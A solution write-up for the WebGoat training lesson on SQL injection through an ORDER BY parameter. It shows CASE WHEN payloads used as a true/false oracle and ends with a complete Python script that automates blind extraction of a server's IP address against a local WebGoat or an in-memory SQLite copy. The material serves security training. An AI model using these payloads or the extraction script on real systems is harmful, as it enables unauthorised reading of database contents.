SQL Injection Mitigation (10)
In this assignment try to perform an SQL injection through the ORDER BY field. Try to find the IP address of the webgoat-prd
server; guessing the complete IP address might take too long, so we give you the last part: xxx.130.219.202
Note: The submit field of this assignment is NOT vulnerable to SQL injection.
Solution
⚠️ The lesson is buggy in the latest version: a call to http://localhost:8080/WebGoat/SqlInjection/servers sends back an error.
💡 Try sorting and look at the request
💡 Intercept the request and try to specify a different order by
💡 Use for example "(case when (true) then hostname else id end)" in the order by and see what happens
Clicking a column header to sort sends a request to http://localhost:8080/WebGoat/SqlInjection/servers?column=ip. The column parameter ends up in the ORDER BY clause of the query, so it can be exploited by intercepting the request (browser developer tools or a proxy) and supplying a crafted expression as the column value.
To get at the webgoat-prd IP address we first have to find out the table name and the name of the IP column. The obvious guess is servers and ip. The address of webgoat-acc (192.168.3.3) is already known, so we can use it as a condition we know to be true and let the sort order tell us whether the guess was right:
column=(CASE WHEN (SELECT ip FROM servers WHERE hostname='webgoat-acc') = '192.168.3.3' THEN id ELSE hostname END)
If the table and column names are correct, the condition evaluates to true and the table comes back sorted by id; if the names are correct but the condition is false, it comes back sorted by hostname; if the names are wrong, the query fails.
After intercepting and changing the request we get the table sorted by id, so the guess was correct.
Just to check the logic, send the same request with a table name that does not exist:
column=(CASE WHEN (SELECT ip FROM whatever WHERE hostname='webgoat-acc') = '192.168.3.3' THEN id ELSE hostname END)
This returns an error page instead of a sorted table, which confirms that the earlier result came from the real servers table. We now have a reliable true/false oracle and everything needed to script the attack.
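The scripted attack that the writeup stops short of, as an added example (this is not code from the original page or from WebGoat itself). It uses the same CASE-in-ORDER-BY trick as a boolean oracle: the row order that comes back for a probe is compared with the baseline orders for column=id and column=hostname, and the webgoat-prd address is recovered either by trying the 256 possible first octets (the lesson's shortcut) or character by character with LIKE 'prefix%' probes (the general form). Assumptions not confirmed by the page: the servers endpoint returns a JSON list of objects with a "hostname" key, the session cookie is named JSESSIONID, and all function and class names here are hypothetical. The SQLite-backed oracle and the SAMPLE_ROWS data are constructed so the block runs offline; the webgoat-prd address in the sample data is a placeholder, not the lesson's answer.

```python
"""Blind boolean SQL injection through WebGoat's ORDER BY column parameter.

Added example, not part of the original writeup or of WebGoat itself.
Assumptions (not confirmed by the page): the table is `servers` with columns
`id`, `hostname`, `ip`; the servers endpoint returns a JSON list of objects
with a "hostname" key; the request needs a valid WebGoat JSESSIONID cookie.
"""
import json
import sqlite3
import urllib.parse
import urllib.request

ALPHABET = "0123456789."
SERVERS_URL = "http://localhost:8080/WebGoat/SqlInjection/servers"


def case_payload(condition):
    """ORDER BY expression that sorts by id when `condition` holds, else by hostname."""
    return f"(CASE WHEN ({condition}) THEN id ELSE hostname END)"


def ip_of(host):
    """Scalar subquery for one server's ip; the table/column names are the writeup's guess."""
    return f"(SELECT ip FROM servers WHERE hostname='{host}')"


class Oracle:
    """Turns one ORDER BY probe into a boolean by comparing the returned row
    order with the baseline orders for column=id and column=hostname."""

    def __init__(self, fetch_order):
        self.fetch_order = fetch_order          # callable: column string -> list of hostnames
        self.by_id = fetch_order("id")
        self.by_host = fetch_order("hostname")
        if self.by_id == self.by_host:
            raise RuntimeError("id and hostname orders coincide; pick other branch columns")

    def holds(self, condition):
        order = self.fetch_order(case_payload(condition))
        if order == self.by_id:
            return True
        if order == self.by_host:
            return False
        raise RuntimeError(f"unexpected row order for probe: {condition!r}")


def recover_first_octet(oracle, suffix, host="webgoat-prd"):
    """Lesson shortcut: only the first octet is unknown, so at most 256 exact-match probes."""
    for octet in range(256):
        candidate = f"{octet}{suffix}"
        if oracle.holds(f"{ip_of(host)} = '{candidate}'"):
            return candidate
    raise RuntimeError("no first octet matched")


def recover_ip(oracle, host="webgoat-prd", max_len=15):
    """General form: extend a prefix one character at a time with LIKE probes,
    stopping as soon as the prefix equals the whole value."""
    prefix = ""
    for _ in range(max_len):
        for ch in ALPHABET:
            if oracle.holds(f"{ip_of(host)} LIKE '{prefix}{ch}%'"):
                prefix += ch
                break
        else:
            raise RuntimeError(f"no character extends {prefix!r}")
        if oracle.holds(f"{ip_of(host)} = '{prefix}'"):
            return prefix
    raise RuntimeError("exceeded maximum IP length")


def webgoat_fetch_order(jsessionid):
    """Live requester against WebGoat (assumed cookie name and JSON shape).
    A broken probe, e.g. a wrong table name, surfaces as an HTTPError."""
    def fetch(column):
        url = SERVERS_URL + "?" + urllib.parse.urlencode({"column": column})
        req = urllib.request.Request(url, headers={"Cookie": f"JSESSIONID={jsessionid}"})
        with urllib.request.urlopen(req) as resp:
            return [row["hostname"] for row in json.load(resp)]
    return fetch


def sqlite_fetch_order(rows):
    """Offline stand-in: the same unsanitised ORDER BY concatenation, run against
    an in-memory SQLite copy of a constructed `servers` table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE servers (id INTEGER, hostname TEXT, ip TEXT)")
    db.executemany("INSERT INTO servers VALUES (?, ?, ?)", rows)
    # Deliberately vulnerable: `column` is pasted straight into ORDER BY, as in the lesson.
    return lambda column: [h for (h,) in db.execute(f"SELECT hostname FROM servers ORDER BY {column}")]


# Constructed sample data; the webgoat-prd address is a placeholder, not the lesson's answer.
SAMPLE_ROWS = [
    (1, "webgoat-dev", "192.168.4.0"),
    (2, "webgoat-tst", "192.168.2.1"),
    (3, "webgoat-acc", "192.168.3.3"),
    (4, "webgoat-prd", "10.130.219.202"),
]

if __name__ == "__main__":
    oracle = Oracle(sqlite_fetch_order(SAMPLE_ROWS))
    print(recover_first_octet(oracle, ".130.219.202"))
    print(recover_ip(oracle))
```

To run it against a live WebGoat, replace `sqlite_fetch_order(SAMPLE_ROWS)` with `webgoat_fetch_order("<your JSESSIONID>")`. For this lesson `recover_first_octet` needs at most 256 requests; `recover_ip` is the general form, roughly 11 probes per character, for when no part of the value is known. A wrong table name shows up as an HTTP error from WebGoat (or an OperationalError from SQLite) rather than as a sorted table, which is exactly the signal the writeup used to confirm the table name.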